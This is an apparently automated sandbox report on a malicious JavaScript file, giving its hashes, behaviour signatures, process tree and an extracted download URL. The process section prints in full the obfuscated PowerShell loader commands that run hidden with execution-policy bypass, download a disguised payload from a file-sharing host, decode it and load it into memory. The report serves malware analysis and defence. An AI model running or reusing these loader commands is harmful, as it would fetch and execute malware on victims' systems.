Analysis

max time kernel: 18s
max time network: 16s
platform: windows7_x64
resource: win7-20240903-en
resource tags: arch:x64, arch:x86, image:win7-20240903-en, locale:en-us, os:windows7-x64, system
submitted: 20-11-2024 17:17

Static task: static1
Behavioral task: behavioral1
Sample: uPh2C.js
Resource: win7-20240903-en
General

Target: uPh2C.js
Size: 58KB
MD5: 705e54950f28c565dbe4818eb2be7423
SHA1: 19ff36dbb676a64197e0a645adf317d2b9cc17d3
SHA256: 0844465dfa8bb241f452c320bc6caf6cec645b461dbcd468a2afc9dc900e595c
SHA512: cc9b21272ba9a2fa038a82c8206303575ce9374f1275b9c394407828c475789616e914befecf58e25c94d451fa92d5a313a611188516b4120015846dac56288f
SSDEEP: 1536:a0vDHXpEjO9Xwq2Sk6e2Nhxdd5pdLv+l/4QmuWOMP3HXpEjO9Xwq2Sk6e2Nhxddi:aoDHXp+q62Nhxdd5pdq61HXp+q62Nhx6
Malware Config

Extracted URL:
https://1017.filemail.com/api/file/get?filekey=2Aa_bWo9Reu45t7BU1kVgsd9pT9pgSSlvStGrnTICfFhmTKj3LC6SQtIcOc_T35w&pk_vid=fd4f614bb209c62c1730945176a0904f
Signatures

Blocklisted process makes network request  (2 IoCs)
flow  pid   Process
5     2204  powershell.exe
6     2204  powershell.exe

Command and Scripting Interpreter: PowerShell  (1 TTPs, 2 IoCs)
Run Powershell and hide display window.
pid   Process
2944  powershell.exe
2204  powershell.exe

Command and Scripting Interpreter: JavaScript  (1 TTPs)

Enumerates physical storage devices  (1 TTPs)
Attempts to interact with connected storage/optical drive(s).

Suspicious behavior: EnumeratesProcesses  (2 IoCs)
pid   Process
2944  powershell.exe
2204  powershell.exe

Suspicious use of AdjustPrivilegeToken  (2 IoCs)
description              pid   Process
Token: SeDebugPrivilege  2944  powershell.exe
Token: SeDebugPrivilege  2204  powershell.exe

Suspicious use of WriteProcessMemory  (6 IoCs)
description                        pid   Process         procid_target
PID 2512 wrote to memory of 2944   2512  wscript.exe     30
PID 2512 wrote to memory of 2944   2512  wscript.exe     30
PID 2512 wrote to memory of 2944   2512  wscript.exe     30
PID 2944 wrote to memory of 2204   2944  powershell.exe  32
PID 2944 wrote to memory of 2204   2944  powershell.exe  32
PID 2944 wrote to memory of 2204   2944  powershell.exe  32
Processes

C:\Windows\system32\wscript.exe
  Command line: wscript.exe C:\Users\Admin\AppData\Local\Temp\uPh2C.js
  - Suspicious use of WriteProcessMemory
  PID: 2512

  C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    Command line: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = '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';$OWjuxD = [system.Text.encoding]::Unicode.GetString([system.Convert]::Frombase64String($Codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD
    - Command and Scripting Interpreter: PowerShell
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of WriteProcessMemory
    PID: 2944

    C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      Command line: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command ". ( $ENV:ComsPEC[4,15,25]-JOin'') ( ('HL1imageUrl = OJ0https://1017.filemail.com/api/'+'file/get?filekey=2Aa_'+'bWo9Reu45t7BU1kVg'+'sd'+'9pT9pgSSlvStGrnTI'+'CfFhmTKj3LC6SQtIcOc_T35w&pk_vid=fd4f614bb209c62c1730945176a0904f OJ0;H'+'L1webClient = New-Object System.Net.WebClient;HL1imageBytes = HL1webClient.DownloadData(HL1imageUrl);HL1imageText = [System.Text.Encoding]::UTF8.GetString(HL1imageBytes);HL1startFlag = OJ0<<BASE64_START>>OJ0;HL1'+'endFlag = OJ0<<BASE64_END>>OJ0;HL1startIndex = HL1imageText.IndexO'+'f(HL1startFlag);HL1endIndex = HL1imageText.IndexOf(HL1endFlag);HL1startIndex -ge 0 -and HL1endIndex -gt HL'+'1startIndex;HL1start'+'Index += HL1startFlag.Length;HL1b'+'ase64Length'+' = HL1'+'endIndex - H'+'L1startIndex;HL1b'+'ase64Command = HL1imageText.Substring(HL1startIndex, HL1base64Length);HL1base64Reversed = -join (HL1base64Command.'+'ToCharArray() IOE ForEach-Object { HL1_ })[-1..-(HL1base64Command.Length)];HL1commandBytes = [System.Convert]::FromBase64String(HL1base64Reversed);HL1loa'+'de'+'dAssembly = [System.Reflection.Assembly]::Load(HL1commandByte'+'s);HL1vaiMethod = [dnlib.IO.Home].GetMethod(OJ0VA'+'IOJ0);HL1vaiMethod.Invoke(HL1null,'+' @(OJ00/tQ9H1/d/ee.etsap//:sptthOJ0, OJ0desativadoOJ0, '+'OJ0desativadoOJ0, OJ0desa'+'tivadoOJ0, OJ0MSBuildOJ0, OJ0des'+'ativadoOJ0,'+' OJ0desativadoOJ0,OJ0desativadoOJ0,OJ0desativadoOJ0,OJ0desativadoOJ0,OJ0desativadoOJ0,OJ0desativadoOJ0,O'+'J01OJ0,OJ0desativadoOJ0));').ReplACE(([cHAr]73+[cHAr]79+[cHAr]69),'|').ReplACE(([cHAr]72+[cHAr]76+[cHAr]49),[STring][cHAr]36).ReplACE(([cHAr]79+[cHAr]74+[cHAr]48),[STring][cHAr]39))"
      - Blocklisted process makes network request
      - Command and Scripting Interpreter: PowerShell
      - Suspicious behavior: EnumeratesProcesses
      - Suspicious use of AdjustPrivilegeToken
      PID: 2204
Network
MITRE ATT&CK Enterprise v15
Downloads

C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
Filesize: 7KB
MD5: 5b6afa02aeeb997e8f50f5b9298d5310
SHA1: 274679b0a94f39ddaac11b9859e85ba50aea392a
SHA256: d036bdd83dd03502dd73cd2184ac712752906f27babae6f95a0df20ec5463237
SHA512: 4ecb7e21f61009f7721dfd10dfbbdfcf79b8379164babda4c3e964b9f95757cb5b57abb1a92b92642f427a23a2ca74acc078dec5d7b4f1ca412f84de8147bf19